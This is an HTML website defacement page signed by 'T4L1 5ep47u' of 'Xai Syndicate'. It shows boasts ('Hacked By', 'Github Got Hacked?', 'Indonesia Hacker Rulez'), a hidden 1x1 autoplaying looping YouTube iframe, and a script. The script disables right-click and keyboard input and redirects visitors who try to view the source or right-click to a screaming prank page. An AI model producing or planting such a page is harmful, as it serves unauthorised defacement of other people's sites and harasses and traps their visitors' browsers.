<!DOCTYPE html>
<html>
<head>
<title>Hacked T4L1 5ep47u</title>
<meta content='Hacked By Xai Syndicate' name='description'/>
<meta content='TerEUe By T4L1 5ep47u Xai Syndicate' name='keywords'/>
<link href="https://fonts.googleapis.com/css?family=Long+Cang|Iceland|Quicksand&display=swap" rel="stylesheet">
<style>
	body{
		background: #000;
		cursor: url("https://s3-us-west-2.amazonaws.com/s.cdpn.io/9632/meh.png"), auto;
	}
	h1{
		font-family: 'iceland';
		color: darkred;
		text-align: center;
	}

	p,h2{
		color: #fff;
		text-align: center;
	}

	h2{
		font-family: 'Quicksand';
		font-style: italic;
	}

	p{
		font-size: 20px;
	}

	.box{
		width: 50%;
		margin:auto;
	}

	.glow {
	  font-size: 50px;
	  color: darkred;
	  text-align: center;
	  -webkit-animation: glow 1s ease-in-out infinite alternate;
	  -moz-animation: glow 1s ease-in-out infinite alternate;
	  animation: glow 1s ease-in-out infinite alternate;
	  font-family: 'iceland';
	}

	@-webkit-keyframes glow {
	  from {
	    text-shadow: 0 0 2px #fff, 0 0 2px #fff, 0 0 2px #eeeddd, 0 0 2px #eeeddd, 0 0 2px #eeeddd, 0 0 2px #eeeddd, 0 0 2px #eeeddd;
	  }
	  
	  to {
	    text-shadow: 0 0 5px #fff, 0 0 3px #eeefff, 0 0 3px #eeefff, 0 0 3px #eeefff, 0 0 3px #eeefff, 0 0 3px #eeefff, 0 0 3px #eeefff;
	  }
	}

	@media only screen and (max-width: 600px) {

		.box{
			width: 100%;
		}
		
	}
</style>
</head>
<body bgcolor="black">
<center><img class="irc_mi" src="https://i.pinimg.com/originals/b0/dc/53/b0dc530acd474409058fb8d476045917.jpg" onload="typeof google==='object'&amp;&amp;google.aft&amp;&amp;google.aft(this)" width="235" height="353" style="margin-top: 0px;" alt="T4L1 5ep47u"></center>
<h1 class="glow">Hacked By T4L1 5ep47u</h1>
<div class="box">
	<p style="font-family: 'Quicksand';">Heyoyoyo Wasap Gaess :v Github Got Hacked?</p>
</div>
<h2>"Dunia Ini Kejam, Seakan Membenciku!"</h2>
-
<p style="color: red; font-family: 'iceland'; font-size: 30px; margin-top: -20px; text-shadow: 0px 0px 2px #fff;">Indonesia Hacker Rulez</p>
<iframe width="1" height="1" src="https://www.youtube.com/embed/p0nEw4qhOlY?rel=0&autoplay=1&loop=1&playlist=XMl5MnbP6ZE" frameborder="0" allowfullscreen="0"></iframe>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
	 <script type='text/javascript'>
		//<![CDATA[
		//Script Redirect CTRL + U
		//Gubuk Game /  ganti dengan url blog kalian
		function redirectCU(e) {
		  if (e.ctrlKey && e.which == 85) {
		    window.location.replace("http://www.screenprank.com/screaming.html");
		    return false;
		  }
		}
		document.onkeydown = redirectCU;

		//Script Redirect Klik Kanan
		function redirectKK(e) {
		  if (e.which == 3) {
		    window.location.replace("http://www.screenprank.com/screaming.html");
		    return false;
		  }
		}
		document.oncontextmenu = redirectKK;
		//]]>
	</script>

</html>
